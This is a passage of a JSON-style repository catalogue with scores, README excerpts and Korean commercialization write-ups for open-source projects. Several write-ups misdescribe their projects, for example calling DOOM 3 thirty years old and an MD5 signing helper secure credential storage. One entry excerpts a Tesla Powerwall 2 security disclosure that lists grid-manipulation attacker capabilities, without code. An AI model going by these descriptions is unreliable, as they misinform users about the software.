[![license](https://img.shields.io/npm/l/tink.svg)](https://npm.im/tink) [![Travis](https://img.shields.io/travis/npm/tink.svg)](https://travis-ci.org/npm/tink) [![AppVeyor](https://ci.appveyor.com/api/projects/status/github/npm/tink?svg=true)](https://ci.appveyor.com/project/npm/tink) [![Coverage Status](https://coveralls.io/repos/github/npm/tink/badge.svg?branch=latest)](https://coveralls.io/github/npm/tink?branch=latest)\n\n[`tink`](https://github.com/npm/tink) is an experimental package manager for\nJavaScript. Don't expect to be able to use this with any of your existing\nprojects.\n\n## **IN DEVELOPMENT**\n\nThis package is still in development. Do **not** use it for production. It is\nmissing major features and the interface should be considered extremely\nunstable.\n\nIf you're feeling adventurous, though, read ahead...\n\n## Usage\n\n`$ npx tink`\n\n## Table of Contents\n\n* [Features](#features)\n* [Contributing](#contrib","composite_score":0.3023,"license_safety_tag":"unknown"},{"name":"gothinkster/ember-realworld","github_url":"https://github.com/gothinkster/ember-realworld","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":36,"description":"# Ember Realworld 프로젝트 분석\n\n## 왜 보물인가\n현대적인 웹 애플리케이션을 빠르고 효율적으로 만들 수 있는 완성된 예제 프로젝트로, 소규모 팀도 쉽게 배워서 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로그 플랫폼, 뉴스 사이트처럼 사용자가 글을 작성하고 공유하는 웹 서비스\n2. **내부 업무 도구","readme_excerpt":"# ![Ember.js Example App](logo.png)\n\n[![RealWorld Frontend](https://img.shields.io/badge/realworld-frontend-%23783578.svg)](http://realworld.io)\n[![This project uses GitHub Actions for continuous integration.](https://github.com/gothinkster/ember-realworld/workflows/CI/badge.svg)](https://github.com/gothinkster/ember-realworld/actions?query=workflow%3ACI)\n[![Netlify Status](https://api.netlify.com/api/v1/badges/d113b25f-ae1c-41b1-8bff-0bfa0b9ac594/deploy-status)](https://app.netlify.com/sites/ember-realworld/deploys)\n\n# Ember RealWorld example app\n\n> ### Ember.js codebase containing real world examples (CRUD, auth, advanced patterns, etc) that adheres to the [RealWorld](https://github.com/gothinkster/realworld-example-apps) spec and API.\n\n### [Demo](https://ember-realworld.netlify.com/)&nbsp;&nbsp;&nbsp;&nbsp;[RealWorld](https://github.com/gothinkster/realworld)\n\n## Prerequisites\n\nYou will need the following things properly installed on your computer.\n\n- [Git](https://git-scm.com/)\n- [","composite_score":0.3022,"license_safety_tag":"unknown"},{"name":"gridsum/DataflowEx","github_url":"https://github.com/gridsum/DataflowEx","stars":6,"language":"C#","license":"mit","abandonment_months":65,"description":"# DataflowEx 프로젝트 분석\n\n## 왜 보물인가\n대량의 데이터를 빠르고 효율적으로 처리하는 기술로, 데이터가 많은 회사들의 업무 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사의 판매 데이터, 고객 정보 등을 실시간으로 정렬하고 분석해주는 웹 서비스\n- **내부 업무 도구**: 대기업의 일일 거래 ","readme_excerpt":"# Welcome to DataflowEx\n\n**Gridsum.DataflowEx** is a high-level dataflow framework redesigned on top of Microsoft TPL Dataflow library with Object-Oriented Programming in mind. It does not replace TPL Dataflow but provides reusability, abstraction and management over underlying dataflow blocks to make your life easier. You can get compiled binaries on [nuget.org](http://www.nuget.org/packages/Gridsum.DataflowEx/).\n\n> **Update:** Gridsum.DataflowEx v2.0 has been [released](https://www.nuget.org/packages/Gridsum.DataflowEx/2.0.0)! This new major version fully supports [.NET standard 2.0](https://blogs.msdn.microsoft.com/dotnet/2017/08/14/announcing-net-standard-2-0/), which means you are able to utilize the library in a wide range of platforms including .Net Core, Xamarin and UWP. \n\nHere is a list of DataflowEx cool features:\n\n* Block chain/graph encapsulation as a reusable component\n* Inheritance and polymorphism for dataflows and their hehaviors\n* Sophisticated dataflow lifecycle manag","composite_score":0.3022,"license_safety_tag":"safe"},{"name":"hackerschoice/thc-tesla-powerwall2-hack","github_url":"https://github.com/hackerschoice/thc-tesla-powerwall2-hack","stars":23,"language":"","license":"unknown","abandonment_months":25,"description":"","readme_excerpt":"# TESLA PowerWall 2 Security Shenanigans\n\n24h ago Elon Musk announced to build the next [TESLA Gigafactory in Germany](https://techcrunch.com/2019/11/12/elon-musk-picks-berlin-for-teslas-europe-gigafactory/), somewhere near Berlin. Here at THC we consider Berlin to be our home turf. Welcome to Berlin, Mr. Musk.❤️\n\nLet's take a look at this TESLA Powerwall 2. Let's make sure the security is up to our standards before it is being sold to our citizens.\n\nThis is a start. Take this and take it further.\n\nTwitter: [@hackerschoice](https://www.twitter.com/hackerschoice)  \neMail: root at thc.org\n\n---\n**EXECUTIVE SUMMARY**\n1. GUI wide open.\n2. Default password on WiFi and management interface\n3. Attacker can cause financial damage to consumer\n4. Attacker can dump entire PW Load into the grid at once\n5. Attacker can oscilate between CHARGING and DUMPING (microseconds, the poor sub-station!)\n6. Attacker can change grid codes.\n\n---\n**Introduction:**\nThe Tesla Powerwall 2 (PW) is a battery storage s","composite_score":0.3022,"license_safety_tag":"unknown"},{"name":"fossasia/2015.fossasia.org","github_url":"https://github.com/fossasia/2015.fossasia.org","stars":12,"language":"CSS","license":"unknown","abandonment_months":42,"description":"# fossasia/2015.fossasia.org 분석 리포트\n\n## 왜 보물인가\n2015년 FOSSASIA 컨퍼런스의 공식 웹사이트로, 오픈소스 커뮤니티의 역사적 기록과 네트워크 자산을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 관리 플랫폼 SaaS**: 행사 일정, 연사자 정보, 참가자 등록을 관리하는 웹 서비스로 재구성\n2. **커","readme_excerpt":"","composite_score":0.3022,"license_safety_tag":"unknown"},{"name":"akarnokd/RxJava2Extensions","github_url":"https://github.com/akarnokd/RxJava2Extensions","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":38,"description":"# RxJava2Extensions 평가 리포트\n\n## 왜 보물인가\n복잡한 프로그래밍 작업을 자동으로 단순하게 만들어주는 도구로, 소프트웨어 개발자들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **실시간 데이터 처리 SaaS**: 주식 시세, 채팅, 알림 등 계속 들어오는 정보를 빠르게 처리하는 웹서비스\n- **모바일 앱 개발 도구*","readme_excerpt":"# RxJavaExtensions\n\n<a href='https://github.com/akarnokd/RxJavaExtensions/actions?query=workflow%3A%22Java+CI+with+Gradle%22'><img src='https://github.com/akarnokd/RxJavaExtensions/workflows/Java%20CI%20with%20Gradle/badge.svg'></a>\n[![codecov.io](http://codecov.io/github/akarnokd/RxJavaExtensions/coverage.svg?branch=3.x)](http://codecov.io/github/akarnokd/RxJavaExtensions?branch=3.x)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.akarnokd/rxjava3-extensions/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.github.akarnokd/rxjava3-extensions)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxjava/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxjava)\n\nRxJava 3.x implementation of extra sources, operators and components and ports of many 1.x companion libraries.\n\n# Releases\n\n**gradle**\n\n```\ndependencies {\n    implementation \"com.github.akarnokd:rxjava3-extensions:3.1.","composite_score":0.3022,"license_safety_tag":"safe"},{"name":"enquirer/enquirer","github_url":"https://github.com/enquirer/enquirer","stars":11,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# Enquirer 저장소 분석\n\n## 왜 보물인가\n사용자의 선택지를 깔끔하게 물어보고 답변을 받을 수 있는 도구로, 웹사이트나 애플리케이션에서 고객 의견을 쉽게 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 설문조사 플랫폼**: 기업이 고객 만족도, 제품 피드백, 시장조사를 온라인으로 진행하는 서비스\n- **내부 업무 도구**: 회사의 ","readme_excerpt":"<h1 align=\"center\">Enquirer</h1>\n\n<p align=\"center\">\n  <a href=\"https://npmjs.org/package/enquirer\">\n    <img src=\"https://img.shields.io/npm/v/enquirer.svg\" alt=\"version\">\n  </a>\n  <a href=\"https://npmjs.org/package/enquirer\">\n    <img src=\"https://img.shields.io/npm/dm/enquirer.svg\" alt=\"downloads\">\n  </a>\n</p>\n\n<br>\n<br>\n\n<p align=\"center\">\n  <b>Stylish CLI prompts that are user-friendly, intuitive and easy to create.</b><br>\n  <sub>>_ Prompts should be more like conversations than inquisitions▌</sub>\n</p>\n\n<br>\n\n<p align=\"center\">\n  <sub>(Example shows Enquirer's <a href=\"#survey-prompt\">Survey Prompt</a>)</a></sub>\n  <img src=\"https://raw.githubusercontent.com/enquirer/enquirer/master/media/survey-prompt.gif\" alt=\"Enquirer Survey Prompt\" width=\"750\"><br>\n  <sub>The terminal in all examples is <a href=\"https://hyper.is/\">Hyper</a>, theme is <a href=\"https://github.com/jonschlinkert/hyper-monokai-extended\">hyper-monokai-extended</a>.</sub><br><br>\n  <a href=\"#built-in-prompts\"><stro","composite_score":0.3022,"license_safety_tag":"safe"},{"name":"davidkpiano/flipping","github_url":"https://github.com/davidkpiano/flipping","stars":8,"language":"TypeScript","license":"mit","abandonment_months":42,"description":"# davidkpiano/flipping 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 카드, 이미지, 텍스트 등을 멋지게 뒤집는 애니메이션 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 학습 플랫폼에서 단어장 카드를 뒤집으며 학습하는 기능\n2. **내부 업무 도구**: 전사 직원 소개 페이지에","readme_excerpt":"# Flipping\n\nA library (and collection of adapters) for [implementing FLIP transitions](https://css-tricks.com/animating-layouts-with-the-flip-technique/).\n\nFor more information about the FLIP technique, view the flipping slides:\n- [CSS Dev Conf 2017](https://slides.com/davidkhourshid/flipping)\n- [CSSConf AU 2018](https://slides.com/davidkhourshid/illusions)\n\n## Examples\n- https://codepen.io/davidkpiano/pen/xLKBpM\n- https://codepen.io/davidkpiano/pen/vmXErw\n- https://codepen.io/davidkpiano/pen/xPVJwm\n- https://codepen.io/davidkpiano/pen/RjaBpW\n- https://codepen.io/davidkpiano/pen/zWrRye\n\n## Installation\n```\nnpm install flipping@latest --save\n```\n\nOr grab the files directly:\n- https://unpkg.com/flipping@latest/dist/flipping.js (core)\n- https://unpkg.com/flipping@latest/dist/flipping.web.js (WAAPI adapter)\n- 🔜 https://unpkg.com/flipping@latest/dist/flipping.css.js (CSS adapter - WIP!)\n\n## Quick Start\n\nIn your HTML, add the `data-flip-key=\"...\"` attribute to shared elements (see HTML examp","composite_score":0.3022,"license_safety_tag":"safe"},{"name":"MinBZK/OperatieBRP","github_url":"https://github.com/MinBZK/OperatieBRP","stars":9,"language":"","license":"AGPL-3.0","abandonment_months":93,"description":"# OperatieBRP 사업화 분석\n\n## 왜 보물인가\n네덜란드 정부가 개발한 주민 신원 정보 관리 시스템으로, 공공행정 디지털화의 핵심 인프라 역할을 하는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 정부 행정 SaaS 서비스**\n지방자치단체나 공공기관을 위한 클라우드 기반 주민 정보 관리 플랫폼으로 재구성하여 제공합니다.\n\n**2. 신원","readme_excerpt":"# Broncode programmatuur operatie Basisregistratie Personen (BRP)\n\nHet ministerie van Binnenlandse Zaken en Koninkrijksrelaties (BZK) heeft in november 2017 een deel van de broncode en documentatie openbaar gemaakt van de programmatuur die was geschreven voor nieuwe centrale ICT-systemen voor de Basisregistratie Personen. Dit project is in juli 2017 gestopt.\n\nIn maart 2018 zijn na aanvullend onderzoek ten aanzien van privacy- en veiligheidsaspecten, ook vrijwel alle resterende delen van de broncode en documentatie openbaar gemaakt, inclusief testbestanden.\n\nSlechts een zeer beperkt deel van de broncode, documentatie en testbestanden wordt niet op deze plaats openbaar gemaakt. Een overzicht van de niet gepubliceerde onderdelen is te vinden in het bestand “Niet gepubliceerd.ods”. Hiermee is vrijwel de volledige laatste versie van de broncode, documentatie en testbestanden van de operatie BRP gepubliceerd.\n\nHet ministerie van Binnenlandse Zaken heeft een maximale inspanning geleverd om pe","composite_score":0.3022,"license_safety_tag":"risky"},{"name":"xuningjack/apikeylib","github_url":"https://github.com/xuningjack/apikeylib","stars":5,"language":"C++","license":"unknown","abandonment_months":99,"description":"# apikeylib 저장소 분석\n\n## 왜 보물인가\n온라인 서비스에서 사용자 인증 정보를 안전하게 관리하고 보호하는 핵심 기술이다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 서비스**: 사용자의 API 키를 암호화하여 보관하고 관리하는 기능\n2. **자동화 업무 도구**: 회사 직원들의 다양한 서비스 접근 권한을 중앙에서 통제하고 모니터링\n3.","readme_excerpt":"# apikeylib\nGenerating sign when access the Internet. (访问网络时签名sign的生成)   \n包括按照map的key排序后value的拼接逻辑。  \n\n\n目前提供以下几种签名生成的逻辑：  \n1、request_body(格式如：key1=value1&key2=value2)按照key排序后value拼接。\nMD5源数据的字符串后，拼接user_token、appkey、timestamp后md5。  \n调用方法：  \nSignHelper.getAuthorization(final String requestBody, final String userToken, final long timestamp)  \n\n2、MD5源数据的字符串后，再拼接appkey后，再MD5，生成最终的字符串。  \n调用方法：  \nSignHelper.getJniEncrptyBytesByMd5(String sign)","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"LidongWen/WenldBanner","github_url":"https://github.com/LidongWen/WenldBanner","stars":38,"language":"Java","license":"unknown","abandonment_months":102,"description":"# WenldBanner 상용화 분석\n\n## 왜 보물인가\n모바일 앱과 웹사이트에서 사용자의 눈에 띄는 배너 광고를 쉽게 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 쇼핑몰이 자신의 사이트에 띄울 프로모션 배너를 직접 디자인하고 배포하는 플랫폼\n2. **내부 업무 도구**: 마케팅팀이 매장 내 디지털 사이","readme_excerpt":"# 一款商业级Banner控件 \r\n\r\n既然敢说商业级，那么就支持足够的自定义与扩展性!  实现思路请看这 [开发一款商业级Banner控件](http://www.jianshu.com/p/a175a6bd80ca)\r\n\r\n效果图：\r\n\r\n![](http://upload-images.jianshu.io/upload_images/1599843-f43b6654680d8587.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\r\n![](http://upload-images.jianshu.io/upload_images/1599843-56d6addd9c2cb735.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\r\n\r\n## 可以做到以下效果\r\n\r\n* 设置自定义指示器效果\r\n* 设置指示器位置\r\n* 设置是否循环\r\n* 是否可以跳转\r\n* 页面切换间隔\r\n* 页面切换持续时间\r\n* 是否支持手动滑动\r\n* 是否反向切换页面（切换方向）\r\n\r\n# use\r\n\r\n## 1、引用:\r\n版本号： [![](https://jitpack.io/v/LidongWen/WenldBanner.svg)](https://jitpack.io/#LidongWen/WenldBanner)\r\n\r\n```\r\n// root build.gradle\r\nrepositories {\r\n    jcenter()\r\n    maven { url \"https://www.jitpack.io\" }\r\n}\r\n// yout project build.gradle\r\ndependencies {\r\n        compile 'com.github.LidongWen:WenldBanner:xxx'\r\n}\r\n```\r\n\r\n## 2. 使用 WenldBanner:\r\n### 2.1.  xml  \r\n    ```\r\n        <com.wenld.wenldbanner.WenldBanner\r\n            xmlns:app=\"http://schemas.android.com/apk/res-auto\"\r","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"danielzeller/Blur-LIB-Android","github_url":"https://github.com/danielzeller/Blur-LIB-Android","stars":5,"language":"Kotlin","license":"NOASSERTION","abandonment_months":30,"description":"# Blur-LIB-Android 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 이미지를 흐릿하게 처리하는 기능을 쉽게 구현할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 앱 SaaS**: 사용자가 온라인에서 직접 사진을 흐릿하게 만들 수 있는 웹 서비스\n2. **프라이버시 보호 도구**: 민감한 정보가 담긴 스크린샷을 자동","readme_excerpt":"# Blur-LIB-Android\n\nA library for Blurring the background of a View.\n\n[<img src=\"/Artwork/PhoneAndScreen.gif\" width=\"400\"/>](https://youtu.be/sYPqS0px61Q)\n\n[See demo on youtube](https://youtu.be/sYPqS0px61Q)\n\n## How it works\nThe blurring is really fast since everything is fully hardware accelerated. The background View that is to be blurred is rendered into a SurfaceTexture using Surface.lockHardwareCanvas().\nThe SurfaceTexture is then blurred using a Guassian blur algorithm and rendered in a SurfaceView or TextureView using OpenGL.\n\n\n## Download\nVia Gradle\n\n```\n   implementation 'no.danielzeller.blurbehindlib:blurbehindlib:1.0.0'\n```\nor Maven\n```\n   <dependency>\n     <groupId>no.danielzeller.blurbehindlib</groupId>\n     <artifactId>blurbehindlib</artifactId>\n     <version>1.0.0</version>\n     <type>pom</type>\n   </dependency>\n```\n\n## Basics\nCreate a BlurBehindLayout from XML\n\n```xml\n    <no.danielzeller.blurbehindlib.BlurBehindLayout\n        android:id=\"@+id/blurBehindLayout\"\n        ","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"rizafahmi/awesome-speakers-id","github_url":"https://github.com/rizafahmi/awesome-speakers-id","stars":5,"language":"","license":"unknown","abandonment_months":34,"description":"# rizafahmi/awesome-speakers-id 평가 보고서\n\n## 왜 보물인가\n인도네시아의 유명한 강연자들을 한곳에 모아놓은 명단으로, 행사 기획자나 기업들이 초청할 강연자를 쉽게 찾을 수 있는 실용적인 자료입니다.\n\n## 어디에 쓸 수 있나\n- **행사 관리 플랫폼**: 기업 컨퍼런스나 세미나를 기획하는 업체들이 강연자 추천 기능으로 활용\n- ","readme_excerpt":"# Awesome Speakers Indonesia [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\n> Para developer keren asal Indonesia yang bisa diundang ke acara komunitas dan konferensi sebagai pembicara atau narasumber.\n\nMari kita kumpulkan data para developer keren asal Indonesia yang dapat diundang ke acara komunitas dan konferensi sebagai pembicara atau narasumber agar mudah dicari dan ditemukan.\n\nSilakan tambahkan nama teman, rekan atau diri sendiri untuk komunitas yang lebih baik. Jika ingin menambahkan teman, saya sarankan minta izin terlebih dahulu biar lebih sopan 🙇‍♂️\n\n## Contents\n\n\n- [Australia](#Australia)\n- [Bali](#bali)\n- [Bandung](#bandung)\n- [Batam](#batam)\n- [Gresik](#gresik)\n- [Jakarta](#jakarta)\n- [Jepang](#jepang)\n- [Lampung](#lampung)\n- [Malang](#malang)\n- [Medan](#medan)\n- [Palembang](#palembang)\n- [Semarang](#semarang)\n- [Sidoarjo](#sidoarjo)\n- [Singapura](#singapura)\n- [Yogyakarta](#yogyakarta)\n\n\n### Australia\n\n<img src=\"http://ielab.io/images/rischan.jpeg\" width=","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"KozGit/DOOM-3-BFG-VR","github_url":"https://github.com/KozGit/DOOM-3-BFG-VR","stars":6,"language":"C++","license":"gpl-3.0","abandonment_months":31,"description":"# DOOM-3-BFG-VR 분석 보고서\n\n## 왜 보물인가\n30년 된 명작 게임을 최신 VR(가상현실) 기술로 재탄생시켜 향수와 혁신을 동시에 제공하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **VR 게임 플랫폼 서비스**: Meta Quest, PlayStation VR 같은 VR 기기 앱스토어에서 유료 게임으로 판매\n2. **VR 기술 라이선","readme_excerpt":"    ____                           _____  ____   ______ ______ _    __ ____   \n   / __ \\ ____   ____   ____ ___  |__  / / __ ) / ____// ____/| |  / // __ \\ \n  / / / // __ \\ / __ \\ / __ `__ \\  /_ < / __  |/ /_   / / __  | | / // /_/ /\n / /_/ // /_/ // /_/ // / / / / /___/ // /_/ // __/  / /_/ /  | |/ // _, _/\n/_____/ \\____/ \\____//_/ /_/ /_//____//_____//_/     \\____/   |___//_/ |_|\n\n\t\t\t\t\t\t\tFully Possessed\n____________________________________________________________________________\n\n\n\nDOOM3-BFG VR : Fully Possessed\nIncludes support for the HTC Vive via SteamVR, the Oculus Rift and Touch motion controls via the\nOculus SDK or SteamVR, and (in theory) Windows Mixed Reality via SteamVR.\n\nVR Implementation: /u/Samson-\nMajor Contributions - Teleportation, Voice Commands, Flicksync, Bink videos, Loading other\n                      savegames, code improvements: Carl Kenner\nHolster slots, Crawl Space Head Collision, minor fixes: Leyland\nDoom VFR style teleporting, JetStrafe, Slow Mo and Tunnel v","composite_score":0.3021,"license_safety_tag":"restricted"},{"name":"kensho-technologies/graphql-compiler","github_url":"https://github.com/kensho-technologies/graphql-compiler","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":42,"description":"# GraphQL Compiler 상용화 분석\n\n## 왜 보물인가\n데이터베이스에서 정보를 찾을 때 복잡한 요청을 자동으로 최적화해주는 도구로, 기업들이 데이터 검색 속도를 크게 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 플랫폼 SaaS**: 기업의 방대한 데이터를 빠르게 검색하고 분석할 수 있는 클라우드 서비스\n2. **기업","readme_excerpt":"graphql-compiler\n================\n\n|Build Status| |Coverage Status| |License| |PyPI Python| |PyPI Version|\n|PyPI Status| |PyPI Wheel| |Code Style|\n\nTurn complex GraphQL queries into optimized database queries.\n\n::\n\n    pip install graphql-compiler\n\nQuick Overview\n--------------\n\nGraphQL compiler is a library that simplifies data querying and exploration by exposing one\nsimple query language written using GraphQL syntax to target multiple database backends. It\ncurrently supports `OrientDB <https://graphql-compiler.readthedocs.io/en/latest/supported_databases/orientdb.html>`__.\nand multiple `SQL <https://graphql-compiler.readthedocs.io/en/latest/supported_databases/sql.html>`__\ndatabase management systems, such as PostgreSQL, MSSQL and MySQL.\n\nFor a detailed overview, see `our blog post <https://blog.kensho.com/compiled-graphql-as-a-database-query-language-72e106844282>`__.\nTo get started, see `our Read the Docs documentation <https://graphql-compiler.readthedocs.io/en/latest/>`__.\nTo co","composite_score":0.3021,"license_safety_tag":"safe"},{"name":"oneHuster/MetaLearningPapers","github_url":"https://github.com/oneHuster/MetaLearningPapers","stars":17,"language":"","license":"unknown","abandonment_months":44,"description":"","readme_excerpt":"# Awesome Meta-Learning Papers [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\nA summary of meta learning papers based on realm. Sorted by submission date on arXiv.\n\n# [Topics]()\n\n* [Survey](#Survey)\n* [Few-shot learning](#Few-shot-learning)\n* [Reinforcement Learning](#Reinforcement-learning)\n* [AutoML](#AutoML)\n* [Task-dependent Methods](#Task-dependent)\n* [Data Aug & Reg](#Data-Aug-&-Reg)\n* [Lifelong learning](#Lifelong-learning)\n* [Domain generalization](#Domain-generalization)     \n* [Neural process](#Neural-process)\n* [Configuration transfer (Adaptation， Hyperparameter Opt)](#Configuration-transfer)\n* [Model compression](#Model-compression)\n* [Kernel learning](#Kernel-learning)\n* [Robustness](#Robustness)\n* [Bayesian inference](#Bayesian-inference)\n* [Optimization](#Optimization)\n* [Theory](#Theory)\n\n## [Survey]()\nMeta-Learning in Neural Networks: A Survey [[paper](https://","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"MichaelBurge/pyramid-scheme","github_url":"https://github.com/MichaelBurge/pyramid-scheme","stars":80,"language":"Racket","license":"AGPL-3.0","abandonment_months":98,"description":"# Pyramid Scheme 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어를 더 쉽게 만들어주는 도구로, 복잡한 코드 작성을 단순하게 변환할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 비프로그래머도 간단한 자동화 작업을 만들 수 있는 웹 플랫폼\n2. **내부 업무 도구**: 기업 내 반복 업무를 자동화하는 스크립트 생성 솔루","readme_excerpt":"# Pyramid Scheme\n\nPyramid is a dialect of the Scheme programming language targeting the Ethereum Virtual Machine(EVM).\n\nHere is an example of a Pyramid program: \n```scheme\n(begin\n  (define (factorial n)\n    (if (= n 1)\n        1\n        (* (factorial (- n 1)) n)))\n  (factorial 5))\n```\n\n## Getting Started\n\nPyramid Scheme is under heavy construction. Join our [public Discord channel](https://discord.gg/854RH6x) if you'd like to contribute or use Pyramid to develop Ethereum contracts.\n\nAfter installing the prerequisites(listed below), \n\n```bash\n$ ./pyramid -t tests/0001-factorial.pmd \n(Test Passed:  return 120 120 ((s . 14066) (g . 47052) (z . 3591)))\n```\n\nTo deploy that program on a test network:\n* Install [Ganache CLI](https://github.com/trufflesuite/ganache-cli)\n* Start an EthereumJS test chain: `ganache-cli -l 10000000`. It will output a list of \"Available Accounts\".\n* Change the `from` variable in [deploy.js](deploy.js) to one of the test accounts.\n* Change the `code` variable to be ","composite_score":0.3021,"license_safety_tag":"risky"},{"name":"z-pattern-matching/z","github_url":"https://github.com/z-pattern-matching/z","stars":10,"language":"JavaScript","license":"apache-2.0","abandonment_months":31,"description":"# z-pattern-matching 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터에서 패턴을 자동으로 찾아내는 기술로, 데이터 분석이 필요한 모든 비즈니스에 숨은 기회를 발굴할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 행동 분석 플랫폼으로 이커머스 업체에 추천 상품 엔진 제공\n- **내부 업무 도구**: 금융사의 부정거래","readme_excerpt":"# ![z](https://raw.githubusercontent.com/leonardiwagner/z/master/z-logo.png) Pattern matching for JavaScript\n\n[![Build Status](https://travis-ci.org/z-pattern-matching/z.svg?branch=master)](https://travis-ci.org/z-pattern-matching/z)\n[![Coverage Status](https://coveralls.io/repos/github/z-pattern-matching/z/badge.svg?branch=master)](https://coveralls.io/github/z-pattern-matching/z?branch=master)\n[![NPM version](https://img.shields.io/npm/v/z.svg)](https://www.npmjs.com/package/z)\n\n### Usage\n- Install via npm: `npm install z`\n- Require z in your code and use the matches function: `const { matches } = require('z')`\n\n### Avaiable Patterns\n\n- Matches by value: `(x = 1) =>, (x = null) =>, (x = 'true') =>`\n- Matches by object or array: `(x = {a: 1}) =>, (x = [1, 2]) =>`\n- Matches by type: `(x = String) =>, (x = Boolean) =>`\n- Matches by instance: `(x = Date) =>, (x = Person) =>`\n- Matches by splitting array into elements and tail `(head, tail) =>` , `(a, b, c, tail) =>`, etc…\n\n\n### Examples\n","composite_score":0.3021,"license_safety_tag":"safe"},{"name":"fossasia/directory.api.fossasia.net","github_url":"https://github.com/fossasia/directory.api.fossasia.net","stars":11,"language":"Python","license":"unknown","abandonment_months":36,"description":"# fossasia/directory.api.fossasia.net 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티의 프로젝트와 기여자들을 한 곳에서 찾고 관리할 수 있는 디렉토리 플랫폼으로, 전 세계 개발자 네트워크 구축의 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 오픈소스 개발자들을 위한 구직/채용 매칭 플랫폼으로 운영 가능","readme_excerpt":"[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Build Status](https://travis-ci.org/fossasia/directory.api.fossasia.net.svg?branch=master)](https://travis-ci.org/fossasia/directory.api.fossasia.net) \n\nGuidelines\n=========\n1- Please fork the fossasia-communities from this the URL: https://github.com/fossasia/fossasia-communities\n\n2- In your fork, add your .JSON file in a country folder, depending on where the community you added exists, then create Pull Request\n\n3- Finally, add the raw link to directory.json but remember to replace your username with fossasia.\n\nEX:\n\n(Before)\n\n  https://raw.githubusercontent.com/USERNAME/fossasia-communities/master/China/ChengduGNU-LinuxUserGroupCDLug-api.json\n  \n(After)\n\n  https://raw.githubusercontent.com/fossasia/fossasia-communities/master/China/ChengduGNU-LinuxUserGroupC","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"fengyc/URLRedirector","github_url":"https://github.com/fengyc/URLRedirector","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":53,"description":"# URLRedirector 보물지도\n\n## 왜 보물인가\n웹사이트 주소를 자동으로 다른 곳으로 보내주는 기술로, 마케팅, 링크 관리, 보안 등 여러 분야에서 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 짧은 URL 생성 서비스(예: bit.ly 같은)로 긴 웹주소를 간단하게 관리하고 클릭 분석 제공\n- **내부 업무 도","readme_excerpt":"URLRedirector\n=============\n\n使用 WebExtension 方式编写的 Firefox URL 重定向扩展，并逐步发展到处理整个 webRequest 过程。\n\n扩展的开发受 [gooreplacer](https://github.com/jiacai2050/gooreplacer) 启发，由于 gooreplacer 在 MAC 下运行时会遇到停止运行的问题，因此采用 WebExtension 方式实现，目前测试结果良好。扩展仅支持正则表达式替换方式，不支持通配符。\n\n扩展可以处理 URL 的自动重定向，可用于帮助网页开发和调试，以及解决国内无法访问 google CDN 之类的问题（ stackoverflow 等国外网站再也不用等了^_^）。\n\nfirefox 版本已上线，上架地址 [https://addons.mozilla.org/zh-CN/firefox/addon/urlredirector/](https://addons.mozilla.org/zh-CN/firefox/addon/urlredirector/)，安装扩展前，请升级 firefox 到 48.0 以上的最新版本。\n\nchrome 版本已上线，商店地址 [https://chrome.google.com/webstore/detail/maolmdhneopinciaokgohljhpdedekee](https://chrome.google.com/webstore/detail/maolmdhneopinciaokgohljhpdedekee)。\n（无法科学上网时可通过开发者模式加载扩展：在 release 中找到 chrome 版本的 zip 压缩包，解压后，在 chrome 中打开开发者模式，加载已解压的扩展程序）\n\nedge 版本提供离线包（注册需要 RMB :-< ），在 release 中可找到 edge 版本的 zip 压缩包，解压后，在 edge 的 about:flags 中启用开发者模式 